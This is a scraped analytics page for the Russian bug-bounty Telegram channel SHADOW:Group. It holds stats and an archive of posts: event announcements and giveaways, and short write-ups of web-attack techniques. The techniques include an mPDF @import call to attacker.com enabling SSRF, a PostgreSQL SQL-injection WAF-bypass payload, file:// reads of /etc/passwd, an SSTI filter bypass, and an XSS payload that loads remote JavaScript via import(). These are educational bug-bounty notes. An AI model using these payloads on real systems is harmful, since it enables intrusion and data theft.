SHADOW:Group

Open in Telegram

Чат: @shadow_chat_tg Рекламу не размещаю. Админ - @shdwpwn

Russia57 454 Technologies & Applications10 892...

📈 Analytical overview of Telegram channel SHADOW:Group

Channel SHADOW:Group (@shadow_group_tg) in the Russian language segment is an active participant. Currently, the community unites 11 458 subscribers, ranking 10 892 in the Technologies & Applications category and 57 454 in the Russia region.

📊 Audience metrics and dynamics

Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 11 458 subscribers.

According to the latest data from 10 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by -10 over the last 30 days and by -2 over the last 24 hours, overall reach remains high.

Verification status: Not verified
Engagement rate (ER): The average audience engagement rate is 20.28%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
Post reach: On average, each post receives 2 324 views. Within the first day, a publication typically gains 0 views.
Reactions and interaction: The audience actively supports content: the average number of reactions per post is 14.
Thematic interests: Content is focused on key topics such as middleware, http/1.1, bounty, api, host.

📝 Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
“Чат: @shadow_chat_tg Рекламу не размещаю. Админ - @shdwpwn”

Thanks to the high frequency of updates (latest data received on 11 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

11 458

Subscribers

-224 hours

+17 days

-1030 days

2 324

Post views

No data24 hours

No data48 hours

20.28%

Engagement rate

No data

Posts per day

Ads index

beta

Posts Archive

11 458

В эту пятницу планирую посетить конференцию Периметр от Metascan'a и вечером на оффлайн часть Bugs Zone. Если будет кто из подписчиков и знакомых, пишите, буду рад пообщаться 👀

11 458

Race Condition одна из тех уязвимостей, которая порой позволяет находить баги там, где их совсем не ждешь. И иногда, чтобы получить какой-нибудь IDOR, достаточно очень много раз попросить об этом приложение. В кейсе на скрине, как раз такой случай. При указании чужого id получаем ошибку, однако, если запустить intruder и подождать несколько тысяч запросов, сервер внезапно начинает отдавать нам чужие ПД. #web #race #idor

11 458

Стартовал прием заявок на Pentest Award 2026 и в этом году появилась новая номинация - AI. Думаю, за последний год у многих есть что сказать по этой теме. Остальные номинации также на месте: Kill Chain, Системный взлом (Web & Logic), Device и Out of Scope. Среди призов стандартно респект от комьюнити и техника Apple. Заявки принимают до 12 июля, а церемония награждения пройдет 14 августа в мск. https://t.me/justsecurity/441

11 458

Repost from BI.ZONE Bug Bounty

🪲 Топовый мерч, две недели закрытого скоупа, ламповая афтепати-вечеринка… Все это ждет вас на нашем любимом приватном ивенте — BUGS ZONE 7.0. Приглашения, как обычно, отправим багхантерам с лучшими результатами за сезон. 🔵Старт хантинга — 15 апреля. 🔵Церемония и афтепати — 22 мая в Москве. Попасть на ивент может каждый. Сдавайте отчеты на нашей платформе и качайте рейтинг — мы обязательно заметим самых активных. Скоро поделимся подробностями. Следите за апдейтами!

11 458

У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...), он делает внешний запрос, даже если HTML полностью экранирован htmlentities() и даже без <style>. Причина проста: mPDF ищет URL-ы через регулярки по всему входу. Поэтому достаточно вставить: @import url(https://attacker.com/test?.css) и сервер сразу пойдёт по указанному адресу. Плюс можно использовать и нестандартные протоколы вроде gopher://, превращая это в SSRF с возможностью дергать внутренние сервисы. Вендор же официально заявил, что это не баг, а фича, и устранять поведение не собирается - по их мнению, движок должен загружать указанные URL, а ответственность за реализацию лежит на разработчиках. #web #ssrf #pdf

11 458

Искал тут что посмотреть под еду на ютубе, и реки вывели мне сей шедевр. Прекрасно все, начиная с кулстори самого проекта, который форсили во многих изданиях, заканчивая сайтом на пыхе с паролями юзеров в открытом виде. https://www.youtube.com/watch?v=HGbP2ibfm8k

11 458

Repost from Ocherk BB

Иногда, когда читаешь раскрытый репорт или статью на Medium об уязвимости в багбаунти, хочется потрогать это руками и заложить у себя в навыках ту или иную багу немного глубже.😵‍💫 Так вот, в итоге из этой мысли я сделал: https://labs.hackadvisor.io/ Все машинки собраны из публичных репортов и статей ресерчеров. Сейчас можно разворачивать стенд, решать задачи, получать подсказки и разбор уязвимости по итогу. Буду потихоньку пилить интересные машинки из раскрытых отчётов — надеюсь, вы тоже закинете что-то интересное: оно обязательно появится. Сразу дисклеймер: у меня пока небольшой опыт в создании таких заданий, так что где-то может быть шероховато. Но со временем буду делать лучше — и сами задания, и их подачу — и добавлять больше интересных сценариев. В целом Labs — это всего лишь MVP и первый этап будущей полноценной экосистемы HackAdvisor, которая, как и всё для сообщества, совершенно бесплатна. Всех обнял, жду фидбек, баги и фича-реквесты🙌🏻 Ну и, пожалуйста, не ломайте сам Labs (даже если очень хочется) — пока там всё очень хрупко 🫠

11 458

Repost from [DeteAct] Оценка защищённости

Захват аккаунта через telegram-бот: от своего номера к чужому профилю Всего пять минут ожидания, один чужой номер телефона и обычная кнопка для получения ссылки — этого оказалось достаточно, чтобы обнаружить критическую уязвимость. Настолько минимальный сценарий неожиданно вскрыл проблему в логике обработки данных. Читать 👉 https://blog.deteact.ru/account-takeover-thru-telegram-bot/

11 458

Друзья, поздравляю вас с наступающим Новым годом 🎄 Пусть он принесёт больше спокойствия, уверенности в себе и своих идеях, новых положительных эмоций и ощущения, что вы идёте в правильном направлении. Желаю интересных и результативных находок, роста там, где вам действительно важно, и достижения новых высот. Постарайтесь отдохнуть в эти праздники и набраться сил. Пусть в новом году всё станет хотя бы немного лучше, чем в прошлом. Спасибо, что вы здесь. Увидимся в 2026 ❤️

11 458

кстати, это я) узнали? согласны?

11 458

Вот с таким интересным принтом получил футболку от ребят из BI.ZONE Bug Bounty. Говорят, если присмотреться, то можно увидеть на нем множество знакомых лиц из багбаунти сообщества. Я узнал примерно половину)

11 458

Недавно занял 2 место в приватном ивенте от ТБанка. Ребята порадовали интересным скоупом и достойными выплатами за что им большой респект 😎

11 458

Проснулся, а тут RCE в React Server Functions с одного запроса уже выполняется. Жаркие споры вчера не прошли напрасно. https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3 https://github.com/msanft/CVE-2025-55182 #web #rce #react

11 458

Repost from Заметки Слонсера

Осознал что не все подписаны на меня в соц сети Илона Маска, поэтому возможно буду дублировать сюда некоторые посты На выходных нашел SQLi в PostgreSQL приложении. Обычно я не пишу про такие находки, но этот случай показался достаточно интересным. Инъекция была path-based (/api/v2/.../INJECTION_POINT/...), и путь не url декодился. Пробелы, слеши, кавычки и скобки приводили к 400 Bad Request. Придумал обход используя dollar-quoting синтаксис PostgreSQL:

$$0$$OR-0-$$0$$NOTNULL

Как PostgreSQL это парсит: 1. $$0$$ - dollar-quoted строка, автоматически каститься в integer 2. OR - логический оператор 3. -0-$$0$$ - арифметическое выражение 4. NOTNULL - проверка на null (вернет true) Для этого payload нужны всего два не alphanumeric символа: $ и - (минус можно заменить на +). Может быть полезно для обхода WAF (например, Cloudflare это не блокирует) или при похожих ограничениях на символы.

11 458

Repost from Кривая опасности

file://localhost/etc/passwd что вернёт? Да, вернётся /etc/passwd. В RFC 8089, верный формат протокола описан как file://<host>/<path>, в то время как все шпоры на LFR при SSRF говорят лишь о file:///<path> Причём, в <host> возможно вписать домен. Система резолвнет его, и если тот указывает на 127.0.0.1, то вернётся содержимое файла. В противном случае получишь лишь отстук в DNS. питон пок


from urllib.request import urlopen

content = urlopen(
  "file://yoogle.com/etc/passwd", timeout=2,
  ).read().decode('utf-8')

print(content)

Представил сколько возможностей для обхода фильтров? И это не последний твой приступ FOMO за сегодня. В статье The Minefield Between Syntaxes от @yeswehack, автор вскрывает проблемы разных синтаксисов и как парсеры выживают с ними.

Представим, ты нашёл SSTI, но WAF блокирует символ $ Что делать?

Неприятно, но не критично, ведь в Python / Perl возможно представить символ через \N{CHARACTER NAME}. Пример обхода фильтра

\N{dollar sign}{7*7} == ${7*7} == 49

Уже на стену лезешь? Погоди, я с тобой ещё не закончил. Давай дальше по загрузке файлов. Видел же в Content-Disposition есть параметр filename? В RFC 6266 описан базовый подход с именем файла, но RFC 8187 вышибает дверь с... чего.. какие юникод байты 😱


# RFC 6266
filename="image.png"

# RFC 8187
filename*=UTF8''image%0a.png

RFC 8187 вводит новые правила для filename параметра, включая поддержку всего Unicode + способности кодировать произвольные байты через % То есть, ты можешь закодировать перенос строки (%0a == \n) и всячески ломать как парсинг имени файла, так и куда тот запишется. . . . FOMO карусель закрыта. Как восстановишь силы, пробегись по статье автора ради:

⚀ разбор CVE из-за проблем синтаксиса [^] ⚀ кейс бб, из cache poisoning в stored xss через пролом валидации parse_url в PHP [^] ⚀ кейс бб, из слепого чтения файлов через SSRF в arbitrary file read [^]

Затем разнеси CTF по ресерчу

1. обход фильтров SSTI [^] 2. иной подход к протоколу file:// [^] 3. пролом parse_url в PHP [^]

#web #waf_bypass

11 458

Решили раздать еще 2 проходки

11 458

Выбор дополнительных победителей (в количестве 2): 🏆 Победители: 1. Alexey (@AlexeyInfosec) 2. Evktolly (@evktolly) ✔️Проверить результаты

11 458

🎉 Результаты розыгрыша: 🏆 Победители: 1. Kot (@cyber_meow) 2. Rechnoj (@rechnoj) 3. Artur (@artur_almaev) ✔️Проверить результаты

11 458

Недавно попалось приложение, которое не давало мне проэксплуатировать XSS. WAF тригерился на использование большинства функций и ключевых слов, таких как alert, document.cookie и других. В таких случаях часто на помощь приходит функция import(), которая позволяет подгружать JS-скрипты из внешнего модуля. Более подробно c этой функцией можете ознакомиться в документации. Для эксплуатации я использовал пэйлоад Javascript:import('//X55.is')// который через import() выполняет загрузку вредоносного JS-модуля, размещенного на сайте X55.is. Данный модуль выполняет обычный alert. Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ #. Все, что будет после #, не будет видно на сервере, что поможет обойти WAF, а модуль в import считает содержимое из document.location.hash и выполнит код.

javascript:import('//X55.is')//#alert('shdw')

#web #waf #xss

11 458

🐞 Розыгрыш проходки на церемонию награждения BUGS ZONE 6.0 20 октября начнется любимый многими багхантерами BUGS ZONE 6.0. Традиционно нас ждет приватный скоуп, мерч, церемония награждения и мощное афтепати. Потому запускаю розыгрыш 3 проходок на церемонию награждения, которая пройдет 7 ноября в Москве. Условия простые: 1️⃣ Быть багхантером (достаточно одного оплаченного репорта за последний год на любой платформе). Отдельно попрошу пруфы у победителей в личке. 2️⃣ Быть подписанным на мой канал Итоги подведу 19 октября - победитель получит приглашение на церемонию награждения BUGS ZONE 6.0 и сможет лично встретиться с командой платформы, триажерами и топовыми хантерами сезона. Следите за апдейтами и удачи всем!